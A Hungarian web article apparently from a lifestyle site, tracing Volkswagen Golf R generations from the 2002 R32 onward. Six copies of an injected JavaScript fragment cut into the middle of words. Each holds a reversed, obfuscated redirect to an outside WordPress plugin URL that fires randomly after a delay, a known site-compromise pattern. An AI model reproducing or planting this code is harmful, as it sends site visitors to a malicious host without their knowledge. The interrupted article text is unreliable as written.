Kezdőlap Férfi Volkswagen Golf R

Volkswagen Golf R

Tizennyolc éve, 2002-ben látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott napvilágot a Golf R32, és ezzel legenda született a legendán belül: a 3,2 literes, hathengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral szerelt, 241 lóerős, összkerékhajtású sportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos ferdehátút egyre brutálisabb utódok követték. A 2005-ös évjárat már 250 lóerőt tudott, majd 2009-ben soros négyhengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor került a V6-os helyére. A 32 elnevezés okafogyottá vált, R20 mégsem lehetett helyette, így maradt az R. A harmadik generációs modell már 270 lóerőt tudott, a negyedik pedig, 2013-ban elérte a mágikus 300 lóerős határt. A soron következő, ötödik generáció elődeihez hasonlóan innovatív megoldásokat hoz, a nyomatékvektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-szabályozással a hátsó tengelyen, adaptív lengéscsillapítással, elektronikus első differenciálzárral. A motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor „minden eddiginél…

- Hirdetés -
MEGOSZTÁS
- Hirdetés -